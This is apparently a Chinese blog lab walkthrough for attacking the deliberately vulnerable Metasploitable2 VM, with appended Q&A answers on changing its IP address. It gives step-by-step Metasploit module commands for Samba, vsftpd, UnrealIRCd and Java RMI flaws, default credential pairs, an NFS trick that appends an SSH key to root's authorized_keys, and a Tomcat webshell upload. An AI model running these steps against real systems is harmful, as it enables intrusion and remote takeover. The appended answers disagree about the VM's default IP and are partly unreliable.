Metasploitable2 靶机漏洞(上)

此次演示环境

1、靶机: Metasploitable2-Linux

                   IP:192.168.160.131

2、攻击演示系统

Kali Linux 1.0.9

一、弱密码漏洞(Weak Password

安全组织索引

CVE:

OSVDB:

BID:

原理

系统或者数据库的登录用户,密码简单或者用户名与密码相同,容易通过暴力破解获取密码。

参考链接如下:

影响系统/软件

所有使用用户名/密码登录的系统/软件都有可能存在

使用工具

Kali Linux

系统弱密码登录

1、在kali上执行命令行telnet 192.168.160.131

2、Login和password都输入msfadmin

3、登录成功,进入系统

4、测试如下:

弱口令:msfadmin/msfadmin

弱口令:user/user

相同的步骤,弱密码还有postgres/postgres、 sys/batman、klog/123456789、service/service

二、MySQL弱密码登录:

1、在kali上执行mysql –h 192.168.160.131 –u root

2、登录成功,进入MySQL系统

3、测试效果:

 

 

三、PostgreSQL 对象-关系数据库服务器)弱密码登录

1、在Kali上执行psql -h 192.168.160.131 –U postgres

2、输入密码:postgres

3、登录成功,进入postgresql系统

四、VNC弱密码登录

1、在kali图形界面的终端中执行vncviewer 192.168.160.131

2、输入密码 password

3、登录成功,进入系统

 

五、Samba MS-RPC Shell 命令注入漏洞

安全组织索引

CVE:CVE-2007-2447

BID:BID-23972

OSVDB:OSVDB-34700

原理

Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者一nobody用户的权限执行任意命令。

参考链接如下:

http://samba.org/samba/security/CVE-2007-2447.html

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534

影响系统/软件

Xerox WorkCentre Pro 

Xerox WorkCentre 

VMWare ESX Server 

Turbolinux Server/Personal/Multimedia/Home/Desktop/Appliance/FUJI 

Trustix Secure Linux 

SUSE Linux Enterprise 

Sun Solaris 

Slackware Linux 

RedHat Enterprise 

Mandriva Linux 

MandrakeSoft Corporate Server 

HP HP-UX 

Gentoo Linux 

Debian Linux 

Apple Mac OS X

使用工具

Kali , Metasploit

利用步骤

  1. 在kali中执行msfconsole,启动metasploit
  2. Use exploit/multi/samba/usermap_script,选择漏洞库
  3. Set RHOST 192.168.160.131 设置要攻击的机器IP
  4. Exploit,开始攻击
  5. 利用成功,执行uname –a 验证

测试过程:

六、Vsftpd源码包后门漏洞

安全组织索引

CVE:

BID:BID-48539

OSVDB:OSVDB-73573

原理

在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意恶意代码。

参考链接如下:

https://pastebin.com/AetT9sS5

影响系统/软件

Vsftpd server v2.3.4

使用工具

Kali  Metasploit

利用步骤

1、在kali中执行msfconsole,启动metasploit

2、use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞

3、set RHOST 192.168.160.131

4、利用成功,执行uname –a 验证

5、测试过程:

七、UnreallRCd后门漏洞

安全组织索引

CVE:CVE-2010-2075

BID:BID-40820

OSVDB:OSVDB-65445

原理

在2009年11月到2010年6月间分布于某些镜面站点的UNreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者就能够执行任意代码。

参考链接:

https://www.unrealircd.org/txt/unrealsecadvisory.20100612.txt

影响系统/软件

Unreal UnrealIRCd 3.2.8.1

使用工具

Kali ,  metasploit

利用步骤

1、在kali中执行msfconsole,启动metasploit

2、use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

set RHOST 192.168.160.131 ,设置要攻击的目标IP地址

3、开始攻击

4、利用成功!使用uname –a 验证

5、测试过程如下

八、Linux NFS共享目录配置漏洞

安全组织索引

CVE:无

OSVDB:无

BID:无

原理

NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys 可被修改,实现远程ssh无密码登录

影响系统/软件

所有Linux系统的NFS服务

使用工具

Kali linux

利用步骤

  1. 在kali上执行命令rpcinfo –p 192.168.160.131 ,查看nfs服务有无开启

  1. showmount –e 192.168.160.131 查看其设置的远程目录列表:

  1. 输入ssh-keygen 生成RSA公钥:

4、依次输入:

(1)mount –t nfs 192.168.160.131://tmp/t00l(预先创建),把192.168.160.131的根目录挂载到/tmp/t00l/下;

注:如果提示下图中错误则需要/etc/init.d/rpcbind start 来启动mount

(2)

cat /root/.ssh/id_rsa.pub>>/tmp/t00l/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下:

(3)sshroot@192.168.160.131,实现无密码登录

九、Java RMI SERVER 命令执行漏洞

安全组织索引

CVE:无

OSVDB:17535

BID:无

原理

Java RMI Server 的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行

影响系统/软件

Oracle Java RMI Server

使用工具

Metasploit

利用步骤

  1. Nmap –p 0-65535 192.168.160.131 来查看1099端口是否开启

1、依次输入以下命令:

use exploit/multi/misc/java_rmi_server

set RHOST 192.168.160.131(靶机的IP地址)

run

shell(进入meterpreter时执行)

10、Tomcat管理台默认口令漏洞

安全组织索

CVE :无

OSVDB:无

BID:无

原理

Tomcat管理台安装好后需要及时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell

影响系统/软件

Tomcat

使用工具

Nessus

JSPwebshell

利用步骤

  1. 访问192.168.160.131:8180,点击tomcat manager,输入tomcat/tomcat,即可进入管理后台。

登录:

  1. 在自己的机器上准备好JSP webshell(liuz.jsp),通过jar –cvf 来打包成liuz.war

       3.上传刚才打包的liuz.war

  

4.打包成功,可以看到应用目录生成/liuz

5.访问192.168.160.131/liuz/liuz.jsp得到webshell


 

### 回答1: 要修改Metasploitable 2的IP地址,您需要编辑虚拟机的网络设置。具体步骤如下: 1. 打开VMware Workstation或Player,选择Metasploitable 2虚拟机并停止它。 2. 右键单击虚拟机并选择“设置”。 3. 在“硬件”选项卡中,选择“网络适配器”并单击“自定义”。 4. 在“网络连接”下拉菜单中选择您要使用的网络连接类型。 5. 在“IP地址”字段中输入新的IP地址。 6. 单击“确定”保存更改。 7. 启动Metasploitable 2虚拟机并验证新的IP地址是否生效。 请注意,更改IP地址可能会影响Metasploitable 2的功能和安全性。在进行任何更改之前,请确保您了解其影响并采取必要的安全措施。 ### 回答2: Metasploitable2 是一个漏洞测试环境,其中集成了大量的漏洞,并且提供了一些测试工具供安全测试人员进行测试。 Metasploitable2 中默认的 IP 地址是 10.0.2.15,在网络中使用该 IP 地址进行测试可能会引起冲突。因此,在测试时,我们需要将 Metasploitable2 的 IP 地址修改为与本地网络相同的 IP 地址。 以下是修改 Metasploitable2 的 IP 地址的步骤: 1. 进入 Metasploitable2 的虚拟机,在控制台或终端输入 ifconfig 命令,查看当前的 IP 地址。 2. 找到网络配置文件,通常是 /etc/network/interfaces,使用文本编辑器打开该文件。 3. 将该文件中的 IP 地址和 netmask 改为与本地网络相同的 IP 地址和 netmask。例如,如果本地网络的 IP 地址是 192.168.1.1,netmask 是 255.255.255.0,那么需要将 Metasploitable2 的 IP 地址改为 192.168.1.x,其中 x 可以是任何未使用的数字。 4. 保存更改后,退出文本编辑器,在终端中输入 sudo service networking restart 命令,以应用更改。 5. 最后,可以使用 ifconfig 命令检查修改后的 IP 地址是否已应用成功。 注意事项: 1. 在虚拟机中修改 Metasploitable2 的 IP 地址时,应确保与宿主机和其他虚拟机不会产生冲突。因此,建议在设置虚拟网络时为每个虚拟机分配一个唯一的 IP 地址。 2. 如果使用 DHCP 来分配 IP 地址,可以在网络配置文件中将 IP 地址改为 DHCP 即可。 通过上述步骤,我们可以成功地将 Metasploitable2 的 IP 地址修改为合适的地址,便于安全测试人员进行测试和演练。 ### 回答3: Metasploitable2是一款用于演示和学习渗透测试的虚拟机操作系统。在使用Metasploitable2进行渗透测试时,通常需要修改其IP地址,以确保数据和攻击都针对正确的目标。 Metasploitable2的IP地址可以通过以下步骤进行修改: 第一步,打开Metasploitable2虚拟机。打开后会显示一些引导信息,等待几秒钟之后会跳出登录窗口。在此登录窗口中输入用户名和密码,即可进入Metasploitable2系统。 第二步,在Metasploitable2系统中,可以使用命令“ifconfig”来查看当前系统的网络配置信息。可以看到默认情况下,该系统的IP地址为192.168.19.128,子网掩码为255.255.255.0。 第三步,修改IP地址。可以通过编辑网络配置文件的方式进行修改。在Metasploitable2系统中,网络配置文件位于 /etc/network/interfaces路径下。可以使用编辑器如nano等来打开该文件。 第四步,在编辑器中,找到“iface eth0 inet static”一行,这是系统的网络配置信息。在该行下方的“address”一行可以修改系统的IP地址。例如,将“address 192.168.19.128”修改为“address 192.168.1.128”,即可将IP地址修改为192.168.1.128。 第五步,修改子网掩码。找到“iface eth0 inet static”下方的“netmask”一行,该行的值为当前系统的子网掩码。在该行中修改子网掩码,例如将“netmask 255.255.255.0”修改为“netmask 255.255.0.0”,即可将系统的子网掩码修改为255.255.0.0。 第六步,保存修改。在编辑器中修改完成后,按下Ctrl+X组合键,然后按下Y键确认保存修改。 第七步,重启系统,让修改生效。在终端中输入“reboot”命令,然后按下回车键。等待系统重启完成后,可以通过ifconfig命令再次查看系统的IP地址和子网掩码,确保已经成功修改。 总的来说,Metasploitable2虚拟机修改IP地址并不难,只需要一些基本的Linux命令操作即可完成。需要注意的是,在修改IP地址之后,可能会需要更改一些攻击工具的设置,以确保攻击目标正确。同时,在进行渗透测试时,一定要遵循法律和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值